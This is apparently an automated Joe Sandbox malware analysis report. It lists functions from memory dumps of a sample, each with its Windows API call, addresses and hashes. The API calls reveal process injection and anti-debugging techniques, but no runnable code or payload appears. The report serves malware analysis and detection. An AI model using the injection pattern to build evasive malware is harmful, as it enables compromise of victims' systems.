                                                                                                                                                                APIs
                                                                                                                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 058785DE
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2384785521.0000000005870000.00000040.00000800.00020000.00000000.sdmp, Offset: 05870000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_5870000_pbCN4g6sN5.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: HandleModule
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 4139908857-0
                                                                                                                                                                • Opcode ID: 98ff89a1feccf93c6cb2666e0952ed344eed230de960ededaebfea22e30c24d5
                                                                                                                                                                • Instruction ID: 19d0093d21d2bf7c417d4fccb615508c48c7953cd177ca136e16dea9663a978f
                                                                                                                                                                • Opcode Fuzzy Hash: 98ff89a1feccf93c6cb2666e0952ed344eed230de960ededaebfea22e30c24d5
                                                                                                                                                                • Instruction Fuzzy Hash: 47812570A00B098FD724DF29D448B5ABBF2FF88304F108929D88AD7A50D775E94ACF91
                                                                                                                                                                Function 06D09D1D Relevance: 1.6, APIs: 1, Instructions: 144fileCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • DeleteFileW.KERNELBASE(00000000), ref: 06D09E30
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2385866228.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_6d00000_pbCN4g6sN5.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: DeleteFile
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 4033686569-0
                                                                                                                                                                • Opcode ID: 15afad2fee2574000312d5eaf7c3e961f266768e463bd6a5d94ba7b1b7b5c65c
                                                                                                                                                                • Instruction ID: 23f055ac2af1e2da0231e30f0aedb7743dbe3fb58900d9e2df4f4abd919cf15d
                                                                                                                                                                • Opcode Fuzzy Hash: 15afad2fee2574000312d5eaf7c3e961f266768e463bd6a5d94ba7b1b7b5c65c
                                                                                                                                                                • Instruction Fuzzy Hash: 8C518E7190D3C58FD752CB69C864799BFB0AF07224F1A41DBC495DB2E3D6385809CBA2
                                                                                                                                                                Function 0587EC64 Relevance: 1.6, APIs: 1, Instructions: 143COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0587ED82
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2384785521.0000000005870000.00000040.00000800.00020000.00000000.sdmp, Offset: 05870000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_5870000_pbCN4g6sN5.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CreateWindow
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 716092398-0
                                                                                                                                                                • Opcode ID: 8f0327601843b606b99e4afe5cd72f081d16cc701b303f8e23a51f1367c9d9f4
                                                                                                                                                                • Instruction ID: 9d0100e0861c15bee3445373b90bed720fa1b1855bc2e163bb67fd1abc260f7b
                                                                                                                                                                • Opcode Fuzzy Hash: 8f0327601843b606b99e4afe5cd72f081d16cc701b303f8e23a51f1367c9d9f4
                                                                                                                                                                • Instruction Fuzzy Hash: A351BFB1C00209AFDF15CFA9C984ADEBFB6FF48314F15816AE919AB220D7719951CF90
                                                                                                                                                                Function 077FCE23 Relevance: 1.6, APIs: 1, Instructions: 114memoryCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 077FCEBB
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2387368395.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_77f0000_pbCN4g6sN5.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                                • Opcode ID: 583d843afd6610386b307ab45dd7a5a0a2765735986325558213c75a03d84212
                                                                                                                                                                • Instruction ID: e3ea666479caaf54cc034b6e5b03652cb7653e7387cc93bf8d5ff5ee084a9b20
                                                                                                                                                                • Opcode Fuzzy Hash: 583d843afd6610386b307ab45dd7a5a0a2765735986325558213c75a03d84212
                                                                                                                                                                • Instruction Fuzzy Hash: 86318FB790468ACFDB22CF59EA407DEBFE0FB49360F14842AD958A7300C3345655DBA1
                                                                                                                                                                Function 0587EC70 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0587ED82
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2384785521.0000000005870000.00000040.00000800.00020000.00000000.sdmp, Offset: 05870000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_5870000_pbCN4g6sN5.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CreateWindow
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 716092398-0
                                                                                                                                                                • Opcode ID: 3a00c17c98d47c936d3098196b26278957eb958f2c95016e461221b8d14fb0e7
                                                                                                                                                                • Instruction ID: ef6297d28d058f8c97ad03f2180573cfc293e0555f908a12837d4bba91e627f7
                                                                                                                                                                • Opcode Fuzzy Hash: 3a00c17c98d47c936d3098196b26278957eb958f2c95016e461221b8d14fb0e7
                                                                                                                                                                • Instruction Fuzzy Hash: 5741C0B1D10309DFDB14CFA9C884ADEBFB5BF48310F64812AE819AB250D7719945CF90
                                                                                                                                                                Function 05971080 Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • CallWindowProcW.USER32(?,?,?,?,?), ref: 05971141
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2384829928.0000000005970000.00000040.00000800.00020000.00000000.sdmp, Offset: 05970000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_5970000_pbCN4g6sN5.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CallProcWindow
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2714655100-0
                                                                                                                                                                • Opcode ID: f7ae6916488a7e600386c9613b83fa17d422c3bc72dd4ef71e9dabbece0f31a9
                                                                                                                                                                • Instruction ID: 5fbd9e26f8eb545b77f53862f1eb7f8e26773291d9d84c4505f77598bcd5c976
                                                                                                                                                                • Opcode Fuzzy Hash: f7ae6916488a7e600386c9613b83fa17d422c3bc72dd4ef71e9dabbece0f31a9
                                                                                                                                                                • Instruction Fuzzy Hash: F14136B4A00309CFDB14CF89C848AAABBF5FB89314F25C459D519AB321D735A841CFA0
                                                                                                                                                                Function 00A1D8B0 Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • CheckRemoteDebuggerPresent.KERNELBASE(00000000,?), ref: 00A1D92F
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2376261436.0000000000A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A10000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_a10000_pbCN4g6sN5.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CheckDebuggerPresentRemote
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3662101638-0
                                                                                                                                                                • Opcode ID: e758b6b3fafe922aa13d587d4a535f4345ffbc07e6dc96d0f4e74e70f4a37428
                                                                                                                                                                • Instruction ID: 4c6aabdde798fb99355779da05900897e4ebfc9461da52e4702354d487c7cbd6
                                                                                                                                                                • Opcode Fuzzy Hash: e758b6b3fafe922aa13d587d4a535f4345ffbc07e6dc96d0f4e74e70f4a37428
                                                                                                                                                                • Instruction Fuzzy Hash: 882178B28002198FCB00CF99C4847EEBBF4EF49320F14842AE858B3250D738AA45CF60
                                                                                                                                                                Function 08EAD760 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 08EAD7F0
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2387833181.0000000008EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08EA0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_8ea0000_pbCN4g6sN5.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: MemoryProcessWrite
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3559483778-0
                                                                                                                                                                • Opcode ID: b119d13a8b04341f723c6ad5100faef8695e57435e0cfe243961f06cca6af145
                                                                                                                                                                • Instruction ID: 52c5fdac56b6eab0e0c7b41489e903036f3c5380fd44588fb28f8fad933a662d
                                                                                                                                                                • Opcode Fuzzy Hash: b119d13a8b04341f723c6ad5100faef8695e57435e0cfe243961f06cca6af145
                                                                                                                                                                • Instruction Fuzzy Hash: AF2139B69003599FCB10DFA9C885BDEBBF5FF48310F108429E959A7250C778A944CFA4
                                                                                                                                                                Function 0587AC59 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0587ACE7
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2384785521.0000000005870000.00000040.00000800.00020000.00000000.sdmp, Offset: 05870000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_5870000_pbCN4g6sN5.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: DuplicateHandle
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3793708945-0
                                                                                                                                                                • Opcode ID: d47ea24d6a4595a1e6bdac724b0f0e516754970a5326fe6309a517bf394388d5
                                                                                                                                                                • Instruction ID: b0cbbef62d224548104fba34a12168baa25d2c20b83c2fcbcf27f6a020a78371
                                                                                                                                                                • Opcode Fuzzy Hash: d47ea24d6a4595a1e6bdac724b0f0e516754970a5326fe6309a517bf394388d5
                                                                                                                                                                • Instruction Fuzzy Hash: A621E4B5900258AFDB10CFAAD984ADEFFF4FB48310F14841AE954A3351C375A944CFA5
                                                                                                                                                                Function 08EAE2A0 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 08EAE31E
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2387833181.0000000008EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08EA0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_8ea0000_pbCN4g6sN5.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ContextThreadWow64
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 983334009-0
                                                                                                                                                                • Opcode ID: be29bb863b552bc05e5a59acb8b31c8cd597d28747d0d9862719ba3047aa659a
                                                                                                                                                                • Instruction ID: 9e49a1169925351bec1500647a7d6de58cfb1a9fed85ec43992387a6a13db4dc
                                                                                                                                                                • Opcode Fuzzy Hash: be29bb863b552bc05e5a59acb8b31c8cd597d28747d0d9862719ba3047aa659a
                                                                                                                                                                • Instruction Fuzzy Hash: 8B2149719003098FDB10DFAAC4857EEBBF4EF48324F108429D459A7240CB78A944CFA4
                                                                                                                                                                Function 08EACD38 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 08EACDB6
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2387833181.0000000008EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08EA0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_8ea0000_pbCN4g6sN5.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ContextThreadWow64
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 983334009-0
                                                                                                                                                                • Opcode ID: 208dd0b74eff5f22585ad9b3ecfbbe4d40ac3d8e87c5e8e5ea1a81a2789406c0
                                                                                                                                                                • Instruction ID: fe89cd09c23c328f8f1a61f6a9d35224895ee3ee5f794cc0b0e03e8d4e4b5acc
                                                                                                                                                                • Opcode Fuzzy Hash: 208dd0b74eff5f22585ad9b3ecfbbe4d40ac3d8e87c5e8e5ea1a81a2789406c0
                                                                                                                                                                • Instruction Fuzzy Hash: 812118729003099FDB10DFAAC4857EEBFF4EF88324F54842AD559A7241CB78A944CFA5
                                                                                                                                                                Function 0587AC60 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0587ACE7
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2384785521.0000000005870000.00000040.00000800.00020000.00000000.sdmp, Offset: 05870000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_5870000_pbCN4g6sN5.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: DuplicateHandle
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3793708945-0
                                                                                                                                                                • Opcode ID: 2ce3d3e7bb85507f69941cc15312d1df8c47b63c18f300e65350830d44cb4bb0
                                                                                                                                                                • Instruction ID: 6057a9cdbea9e2672cfc16cc874913b52de66b115465f7bcad1d48d7905f7c5b
                                                                                                                                                                • Opcode Fuzzy Hash: 2ce3d3e7bb85507f69941cc15312d1df8c47b63c18f300e65350830d44cb4bb0
                                                                                                                                                                • Instruction Fuzzy Hash: AC21E4B5900208AFDB10CF9AD584ADEFFF4FB48310F14841AE914A3350C375A944CFA4
                                                                                                                                                                Function 08EAE000 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • VirtualProtectEx.KERNELBASE(?,?,?,?,?), ref: 08EAE077
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2387833181.0000000008EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08EA0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_8ea0000_pbCN4g6sN5.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                                • Opcode ID: 528f69b1254ba326a17aadd45b0488f3157e6a865bd631c046f603fd6bb31356
                                                                                                                                                                • Instruction ID: bfafe7cf02d53096f1fe16b34c73312c7cc987c95f98973da989858eaa6194b8
                                                                                                                                                                • Opcode Fuzzy Hash: 528f69b1254ba326a17aadd45b0488f3157e6a865bd631c046f603fd6bb31356
                                                                                                                                                                • Instruction Fuzzy Hash: B22129718003499FDB10DFAAC485BEEBBF5EF48320F508429D559A7250C779A544CFA1
                                                                                                                                                                Function 08EA3F60 Relevance: 1.6, APIs: 1, Instructions: 57memoryCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 08EA3FDB
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2387833181.0000000008EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08EA0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_8ea0000_pbCN4g6sN5.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                                • Opcode ID: ebeb9591270e5eb273b0c2c001df31a12db546d3ea0a65f9e93642c9ccf1b370
                                                                                                                                                                • Instruction ID: ca1840b0ef6dbd15ccfdf7ed71b0403ce46809639d5456626460c5bf601a8e85
                                                                                                                                                                • Opcode Fuzzy Hash: ebeb9591270e5eb273b0c2c001df31a12db546d3ea0a65f9e93642c9ccf1b370
                                                                                                                                                                • Instruction Fuzzy Hash: BC21F4B69002499FCB10CF9AC584BDEBBF4BB48324F10842AE558A7250D375A545CFA5
                                                                                                                                                                Function 06D09DC0 Relevance: 1.6, APIs: 1, Instructions: 56fileCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • DeleteFileW.KERNELBASE(00000000), ref: 06D09E30
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2385866228.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_6d00000_pbCN4g6sN5.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: DeleteFile
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 4033686569-0
                                                                                                                                                                • Opcode ID: 3afc5e676c55dd0729ac1d8bf3a121c8f210e919b49ba9e789cf053eae86be78
                                                                                                                                                                • Instruction ID: f92f5247c9e7509734d15424b71897d92c541ab61ae5a7256f3836a75dda1cb4
                                                                                                                                                                • Opcode Fuzzy Hash: 3afc5e676c55dd0729ac1d8bf3a121c8f210e919b49ba9e789cf053eae86be78
                                                                                                                                                                • Instruction Fuzzy Hash: 8F1103B1C0065A9BDB14CF9AC544BDEFBF4BB48320F15812AD858A7391D738A944CFA5
                                                                                                                                                                Function 077FCE48 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 077FCEBB
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2387368395.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_77f0000_pbCN4g6sN5.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                                • Opcode ID: 7359f6005607a6f85870ac164b6b08d30c18735c66e597d1d1a6d0119d04ba04
                                                                                                                                                                • Instruction ID: 97974f195845c1afd826b93546e19553211f12c8e52094b059fe0d72a0018c26
                                                                                                                                                                • Opcode Fuzzy Hash: 7359f6005607a6f85870ac164b6b08d30c18735c66e597d1d1a6d0119d04ba04
                                                                                                                                                                • Instruction Fuzzy Hash: 7A21E4B59002499FCB10DF9AC584BDEFBF4FB48320F10842AE958A7351D378A644CFA5
                                                                                                                                                                Function 08EA3F68 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 08EA3FDB
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2387833181.0000000008EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08EA0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_8ea0000_pbCN4g6sN5.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                                • Opcode ID: d3e9be42927d563b18de8bb8ce25478f5563065db94a57ba73c7fd95f7436f7c
                                                                                                                                                                • Instruction ID: d8d27d1293cbcfd6bbd492658d829abda3e544f212f122a2cbf0ac3741f8ec56
                                                                                                                                                                • Opcode Fuzzy Hash: d3e9be42927d563b18de8bb8ce25478f5563065db94a57ba73c7fd95f7436f7c
                                                                                                                                                                • Instruction Fuzzy Hash: 9A2103B69002499FCB10CF9AC484BDEFBF4EB48320F108429E858A7250D379A544CFA5
                                                                                                                                                                Function 00A1B534 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • OutputDebugStringW.KERNELBASE(00000000), ref: 00A1DAB0
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2376261436.0000000000A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A10000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_a10000_pbCN4g6sN5.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: DebugOutputString
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1166629820-0
                                                                                                                                                                • Opcode ID: a8494805acb9b2339d459328f2138094437d6253d608a7a92ed21b41ae679db0
                                                                                                                                                                • Instruction ID: 9e86fd6b85a13bed0dcf83f5624b72ba964390e40c372db2b012e322b032713d
                                                                                                                                                                • Opcode Fuzzy Hash: a8494805acb9b2339d459328f2138094437d6253d608a7a92ed21b41ae679db0
                                                                                                                                                                • Instruction Fuzzy Hash: AD1100B1C046599BCB14CF9AD544ADEFBB4FB48320F14812AD819A7250D774AA84CFA5
                                                                                                                                                                Function 08EAD420 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 08EAD48E
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2387833181.0000000008EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08EA0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_8ea0000_pbCN4g6sN5.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 4275171209-0
                                                                                                                                                                • Opcode ID: eba5c81728784d6455a8c2749946931bd29904f98fd205f25ff834c92becbf0a
                                                                                                                                                                • Instruction ID: f4fcce582af72bb0a8386d9a57a66664f5609d7bc432934cc9d71da0004f249d
                                                                                                                                                                • Opcode Fuzzy Hash: eba5c81728784d6455a8c2749946931bd29904f98fd205f25ff834c92becbf0a
                                                                                                                                                                • Instruction Fuzzy Hash: 471137729002499FCB10DFAAC845BDEBFF5EF88324F108819E559A7250C775A544CFA0
                                                                                                                                                                Function 00A1DA38 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • OutputDebugStringW.KERNELBASE(00000000), ref: 00A1DAB0
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2376261436.0000000000A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A10000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_a10000_pbCN4g6sN5.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: DebugOutputString
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1166629820-0
                                                                                                                                                                • Opcode ID: 18c32c8163f332011b4d509008c3a1061aa789fed33ec3b65a7023f792581d0e
                                                                                                                                                                • Instruction ID: e62cb8ccf94ebc8b8c592fc8ea61f13620942b68f6dbf479c826869d54729404
                                                                                                                                                                • Opcode Fuzzy Hash: 18c32c8163f332011b4d509008c3a1061aa789fed33ec3b65a7023f792581d0e
                                                                                                                                                                • Instruction Fuzzy Hash: B71142B1C0465A9BCB00CF9AD444BDEFBB4FF48320F14826AD828A7240D374A984CFA5
                                                                                                                                                                Function 08EAE508 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2387833181.0000000008EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08EA0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_8ea0000_pbCN4g6sN5.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ResumeThread
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 947044025-0
                                                                                                                                                                • Opcode ID: 99be79b2c9cb734baeee6c965b2067f66d98b8fe0415dae949f65930fbdb712f
                                                                                                                                                                • Instruction ID: 2a2f4d52d426f51f642970d1b9513121ff93fd412d3aff420a081e53239b6b0a
                                                                                                                                                                • Opcode Fuzzy Hash: 99be79b2c9cb734baeee6c965b2067f66d98b8fe0415dae949f65930fbdb712f
                                                                                                                                                                • Instruction Fuzzy Hash: 161136B19003498FDB20DFAAD4457DEFBF4EB88324F248829D459A7250DB75A944CFA4
                                                                                                                                                                Function 05878578 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 058785DE
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2384785521.0000000005870000.00000040.00000800.00020000.00000000.sdmp, Offset: 05870000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_5870000_pbCN4g6sN5.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: HandleModule
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 4139908857-0
                                                                                                                                                                • Opcode ID: 65cf7a3fa75a7432ec9a9b5f08f20622116689ff289c1518fbabc12e1203c122
                                                                                                                                                                • Instruction ID: fa48728ee97c2ff8fd15181e9fc4c4790b737408c0bb50143f25625ac8f1f6a8
                                                                                                                                                                • Opcode Fuzzy Hash: 65cf7a3fa75a7432ec9a9b5f08f20622116689ff289c1518fbabc12e1203c122
                                                                                                                                                                • Instruction Fuzzy Hash: CB11E0B5C003498FCB10CF9AC448ADEFBF4AB88324F10842AD869A7610D375A545CFA5
                                                                                                                                                                Function 08EADAD8 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 08EAE9FD
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2387833181.0000000008EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08EA0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_8ea0000_pbCN4g6sN5.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: MessagePost
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 410705778-0
                                                                                                                                                                • Opcode ID: 4c4eed14957825b0ea770a4cc7846654aca225d8e4a126bca51ac74aae34b8c9
                                                                                                                                                                • Instruction ID: 491344924253d05a57f3d7f0ac0384085df0343ba21681ef2b069910a3d865b6
                                                                                                                                                                • Opcode Fuzzy Hash: 4c4eed14957825b0ea770a4cc7846654aca225d8e4a126bca51ac74aae34b8c9
                                                                                                                                                                • Instruction Fuzzy Hash: 3F11F2B58003499FDB20DF9AC849BDEBBF8EB48324F108459E558B7240C375A984CFA5
                                                                                                                                                                Function 00A1DADC Relevance: 1.5, APIs: 1, Instructions: 32COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • OutputDebugStringW.KERNELBASE(00000000), ref: 00A1DAB0
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2376261436.0000000000A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A10000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_a10000_pbCN4g6sN5.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: DebugOutputString
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1166629820-0
